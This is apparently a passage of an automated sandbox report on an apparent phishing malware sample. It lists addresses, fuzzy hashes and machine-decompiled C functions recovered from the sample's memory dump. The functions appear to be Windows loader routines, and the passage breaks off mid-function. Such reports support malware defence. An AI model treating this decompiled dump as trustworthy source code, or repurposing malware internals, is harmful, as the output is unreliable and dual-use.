                                                                                                                                                                                  0x333e3176
                                                                                                                                                                                  0x333e3177
                                                                                                                                                                                  0x333e317c
                                                                                                                                                                                  0x333e3184
                                                                                                                                                                                  0x333e3189
                                                                                                                                                                                  0x333e318e
                                                                                                                                                                                  0x333e3196
                                                                                                                                                                                  0x333e319b
                                                                                                                                                                                  0x333e31a2
                                                                                                                                                                                  0x333e31b4
                                                                                                                                                                                  0x333e31a4
                                                                                                                                                                                  0x333e31ad
                                                                                                                                                                                  0x333e31ad
                                                                                                                                                                                  0x333e31b9
                                                                                                                                                                                  0x333e31be
                                                                                                                                                                                  0x333e31c7
                                                                                                                                                                                  0x333e31d9
                                                                                                                                                                                  0x333e31c9
                                                                                                                                                                                  0x333e31d2
                                                                                                                                                                                  0x333e31d2
                                                                                                                                                                                  0x333e31db
                                                                                                                                                                                  0x333e31e2
                                                                                                                                                                                  0x333e31e2
                                                                                                                                                                                  0x333e31ec
                                                                                                                                                                                  0x333e3224
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e31f7
                                                                                                                                                                                  0x333e31f7
                                                                                                                                                                                  0x333e31f9
                                                                                                                                                                                  0x333e31ff
                                                                                                                                                                                  0x333e3204
                                                                                                                                                                                  0x333e3205
                                                                                                                                                                                  0x333e3206
                                                                                                                                                                                  0x333e320b
                                                                                                                                                                                  0x333e320f
                                                                                                                                                                                  0x333e326a
                                                                                                                                                                                  0x333e3270
                                                                                                                                                                                  0x333e3271
                                                                                                                                                                                  0x333e3272
                                                                                                                                                                                  0x333e327d
                                                                                                                                                                                  0x333e327d
                                                                                                                                                                                  0x333e3211
                                                                                                                                                                                  0x333e3219
                                                                                                                                                                                  0x333e321f
                                                                                                                                                                                  0x333e3229
                                                                                                                                                                                  0x333e3230
                                                                                                                                                                                  0x333e323b
                                                                                                                                                                                  0x333e323b
                                                                                                                                                                                  0x333e3244
                                                                                                                                                                                  0x333e324d
                                                                                                                                                                                  0x333e3258
                                                                                                                                                                                  0x333e3258
                                                                                                                                                                                  0x333e325e
                                                                                                                                                                                  0x333e3265
                                                                                                                                                                                  0x333e3265
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3244

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                  • Opcode ID: b8208f57ac2eee4cd21cb23a3f433955901f2fa0029090c79f4759fdd4f2f43b
                                                                                                                                                                                  • Instruction ID: 69e802532edcb9904329c4a562ab1d438d5d20f1f3681f0a65216eb4b2aba0a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: b8208f57ac2eee4cd21cb23a3f433955901f2fa0029090c79f4759fdd4f2f43b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9431DE76A487509FE301CF68D880B1AB7E8EF85764F049869F894CB390EB31D905C753
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333506CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E333506CF(char __ecx, signed int __edx, signed int* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32) {
				char _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v28;
				void* _v32;
				void* _v36;
				void* __ebx;
				intOrPtr _t26;
				signed int _t37;
				intOrPtr _t49;
				void* _t52;
				signed int _t54;
				void* _t56;
				intOrPtr _t57;

				_t56 = (_t54 & 0xfffffff8) - 0xc;
				_v12 = __ecx;
				_t37 = __edx;
				_v16 = 0;
				_t49 = 0;
				_t57 =  *0x33445da8; // 0x0
				if(_t57 != 0) {
					_t52 = 0xc000010a;
					L9:
					return _t52;
				}
				_t52 = E33350FB0(__ecx, __edx, 0x334467c0, 0x3334ea20, 0, 0);
				if(_t52 < 0) {
					goto L9;
				}
				_t40 = _a16;
				if(_a16 != 0) {
					_t49 = E3334DE45(_t40);
					if(_t49 != 0) {
						goto L3;
					}
					_t52 = 0xc0000017;
					goto L9;
				}
				L3:
				_t47 = _t37;
				_t52 = E333509F0( &_v12, _t37, _a4, _a8, _t49, _a20, _a24);
				if(_t52 < 0) {
					L12:
					_t26 = _v12;
					L7:
					if(_t26 != 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
					}
					if(_t49 != 0) {
						E3334C0F6(_t37, _t49, _t47);
					}
					goto L9;
				}
				_t9 =  &_a32; // 0x3334ea20
				_push( *_t9);
				_t47 = _a12;
				_t11 = _t56 + 0x18; // 0x3334ea20
				_push(_a28);
				_t49 = 0;
				_t52 = E333508CD(_t11, _a12);
				if(_t52 < 0) {
					goto L12;
				}
				_t37 =  *(_t56 + 0xc);
				 *_a4 = _t37;
				_t47 = _t37;
				_t52 = E333507A7(_a8, _t37);
				if(_t52 < 0) {
					_t47 = _t37;
					 *_a4 =  *_a4 & 0;
					E3337EB1C( *((intOrPtr*)(_t37 + 0xc)), _t37,  &_a4);
				}
				_t26 = 0;
				goto L7;
			}

















                                                                                                                                                                                  0x333506d7
                                                                                                                                                                                  0x333506dd
                                                                                                                                                                                  0x333506e1
                                                                                                                                                                                  0x333506e3
                                                                                                                                                                                  0x333506e9
                                                                                                                                                                                  0x333506eb
                                                                                                                                                                                  0x333506f1
                                                                                                                                                                                  0x333aea3e
                                                                                                                                                                                  0x3335077b
                                                                                                                                                                                  0x33350783
                                                                                                                                                                                  0x33350783
                                                                                                                                                                                  0x33350708
                                                                                                                                                                                  0x3335070c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335070e
                                                                                                                                                                                  0x33350713
                                                                                                                                                                                  0x3335078b
                                                                                                                                                                                  0x3335078f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33350791
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33350791
                                                                                                                                                                                  0x33350715
                                                                                                                                                                                  0x33350718
                                                                                                                                                                                  0x3335072d
                                                                                                                                                                                  0x33350731
                                                                                                                                                                                  0x33350798
                                                                                                                                                                                  0x33350798
                                                                                                                                                                                  0x3335076f
                                                                                                                                                                                  0x33350771
                                                                                                                                                                                  0x333aea6e
                                                                                                                                                                                  0x333aea6e
                                                                                                                                                                                  0x33350779
                                                                                                                                                                                  0x333507a0
                                                                                                                                                                                  0x333507a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33350779
                                                                                                                                                                                  0x33350733
                                                                                                                                                                                  0x33350733
                                                                                                                                                                                  0x33350736
                                                                                                                                                                                  0x33350739
                                                                                                                                                                                  0x3335073d
                                                                                                                                                                                  0x33350740
                                                                                                                                                                                  0x33350747
                                                                                                                                                                                  0x3335074b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33350751
                                                                                                                                                                                  0x33350755
                                                                                                                                                                                  0x3335075c
                                                                                                                                                                                  0x33350763
                                                                                                                                                                                  0x33350767
                                                                                                                                                                                  0x333aea4c
                                                                                                                                                                                  0x333aea4e
                                                                                                                                                                                  0x333aea58
                                                                                                                                                                                  0x333aea58
                                                                                                                                                                                  0x3335076d
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 43$ 43
                                                                                                                                                                                  • API String ID: 0-1398290363
                                                                                                                                                                                  • Opcode ID: 540b26597d77fc720ae95d634ebdc3934dcba830950bf8c83bb91ba22ae02f3f
                                                                                                                                                                                  • Instruction ID: 183b5013a89a67b98dbca3bec7fdd11a2174d0f19efa32bef4f0cc19c1504e31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 540b26597d77fc720ae95d634ebdc3934dcba830950bf8c83bb91ba22ae02f3f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1231A036E057119BE712DF28C8C0E9B77E9EF846A0F05C569FC5597220EA39DC058BA1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333831BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                                  			E333831BE(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3344b370 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(L333658B0(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E33394B50(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = L33392D80();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E33392A80();
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                                                                  0x333831c6
                                                                                                                                                                                  0x333831d0
                                                                                                                                                                                  0x333831db
                                                                                                                                                                                  0x333831df
                                                                                                                                                                                  0x333831e0
                                                                                                                                                                                  0x333831e6
                                                                                                                                                                                  0x333831e7
                                                                                                                                                                                  0x333831e8
                                                                                                                                                                                  0x333831e9
                                                                                                                                                                                  0x333831ec
                                                                                                                                                                                  0x333831ee
                                                                                                                                                                                  0x333831f6
                                                                                                                                                                                  0x333832ae
                                                                                                                                                                                  0x33383275
                                                                                                                                                                                  0x33383279
                                                                                                                                                                                  0x3338327a
                                                                                                                                                                                  0x3338327b
                                                                                                                                                                                  0x33383286
                                                                                                                                                                                  0x33383286
                                                                                                                                                                                  0x33383200
                                                                                                                                                                                  0x33383204
                                                                                                                                                                                  0x3338320b
                                                                                                                                                                                  0x3338328b
                                                                                                                                                                                  0x33383293
                                                                                                                                                                                  0x33383297
                                                                                                                                                                                  0x3338320d
                                                                                                                                                                                  0x3338320d
                                                                                                                                                                                  0x3338320d
                                                                                                                                                                                  0x3338320f
                                                                                                                                                                                  0x33383217
                                                                                                                                                                                  0x3338321f
                                                                                                                                                                                  0x33383224
                                                                                                                                                                                  0x3338322c
                                                                                                                                                                                  0x3338322d
                                                                                                                                                                                  0x33383235
                                                                                                                                                                                  0x33383239
                                                                                                                                                                                  0x3338323d
                                                                                                                                                                                  0x33383242
                                                                                                                                                                                  0x33383246
                                                                                                                                                                                  0x3338324a
                                                                                                                                                                                  0x333832a3
                                                                                                                                                                                  0x333832a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c27e6
                                                                                                                                                                                  0x333c27e9
                                                                                                                                                                                  0x333c27f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338324c
                                                                                                                                                                                  0x3338324c
                                                                                                                                                                                  0x3338325a
                                                                                                                                                                                  0x33383261
                                                                                                                                                                                  0x33383287
                                                                                                                                                                                  0x33383263
                                                                                                                                                                                  0x33383269
                                                                                                                                                                                  0x333832b6
                                                                                                                                                                                  0x333832b6
                                                                                                                                                                                  0x33383269
                                                                                                                                                                                  0x33383273
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383273

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                  • Opcode ID: 8e741c3165378eda8e6d0e55ac0879e2173dd7a5b63f413f992f6c85712b8b93
                                                                                                                                                                                  • Instruction ID: a02ddf4e465811f6b81ace2c4b6a8ea1989b6891b315090a61dff3dc2795f43a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e741c3165378eda8e6d0e55ac0879e2173dd7a5b63f413f992f6c85712b8b93
                                                                                                                                                                                  • Instruction Fuzzy Hash: D93172B59493059FD311DF28C880A5BBBE8EB85664F44852EF99887350D634DD088B93
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333833D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                  			E333833D0(signed int* __ecx, signed int __edx, void* _a4) {
				signed int _v8;
				void* _t17;
				signed int* _t26;
				signed int _t29;
				void* _t34;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t26 = __ecx;
				_t41 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_push(_t41);
					_push(_t26);
					E333DEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Map        : 0x%p\nSXS:    EntryCount : 0x%lx\n", "RtlpInitializeAssemblyStorageMap");
					_t17 = 0xc000000d;
				} else {
					_t34 = _a4;
					if(_t34 == 0) {
						_t29 = 4;
						_t17 = L33384CF8( &_v8, __edx * _t29, __edx * _t29 >> 0x20);
						if(_t17 >= 0) {
							_t34 = L33365D90( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
							if(_t34 != 0) {
								_v8 = 1;
								goto L3;
							} else {
								_t17 = 0xc0000017;
							}
						}
					} else {
						L3:
						if(_t41 != 0) {
							memset(_t34, 0, _t41 << 2);
						}
						 *_t26 = _v8;
						_t17 = 0;
						_t26[1] = _t41;
						_t26[2] = _t34;
					}
				}
				return _t17;
			}









                                                                                                                                                                                  0x333833d5
                                                                                                                                                                                  0x333833d6
                                                                                                                                                                                  0x333833d7
                                                                                                                                                                                  0x333833dd
                                                                                                                                                                                  0x333833df
                                                                                                                                                                                  0x333833e4
                                                                                                                                                                                  0x333c2898
                                                                                                                                                                                  0x333c2899
                                                                                                                                                                                  0x333c28a8
                                                                                                                                                                                  0x333c28b0
                                                                                                                                                                                  0x333833f2
                                                                                                                                                                                  0x333833f2
                                                                                                                                                                                  0x333833f7
                                                                                                                                                                                  0x333c2852
                                                                                                                                                                                  0x333c285c
                                                                                                                                                                                  0x333c2863
                                                                                                                                                                                  0x333c287c
                                                                                                                                                                                  0x333c2880
                                                                                                                                                                                  0x333c288c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c2882
                                                                                                                                                                                  0x333c2882
                                                                                                                                                                                  0x333c2882
                                                                                                                                                                                  0x333c2880
                                                                                                                                                                                  0x333833fd
                                                                                                                                                                                  0x333833fd
                                                                                                                                                                                  0x333833ff
                                                                                                                                                                                  0x33383407
                                                                                                                                                                                  0x33383407
                                                                                                                                                                                  0x3338340c
                                                                                                                                                                                  0x3338340e
                                                                                                                                                                                  0x33383410
                                                                                                                                                                                  0x33383413
                                                                                                                                                                                  0x33383413
                                                                                                                                                                                  0x333833f7
                                                                                                                                                                                  0x3338341a

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 333C289A
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 333C289F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                  • API String ID: 0-2653619699
                                                                                                                                                                                  • Opcode ID: 0543fdb78dd450dda2f4c329d55f76cf7423430e19aeb6bdfc206a58686f27fc
                                                                                                                                                                                  • Instruction ID: bc0ecfa46799d36352173f51afcb4194f97e40289ae71f804cbee2035705f0ea
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0543fdb78dd450dda2f4c329d55f76cf7423430e19aeb6bdfc206a58686f27fc
                                                                                                                                                                                  • Instruction Fuzzy Hash: A111027AF05304BFFB168E498C80F5A76ACEB84764F54C029B908EF244DAB8CD4486A1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E3335C6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x3342c008);
				_push(E3339AD20);
				_push( *[fs:0x0]);
				_t428 =  *0x3344b370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E3335E580("true", _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_t432 = E3335AB70(_t555, _t626, _t640, __eflags, _v96,  &_v172, 0x100, "true");
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E333494A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = E333A6D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t306 = _t626 + 0x10; // 0x10
													_t612 = _t306;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E333A6E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = E3335B9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							L33350C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = E3335B9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
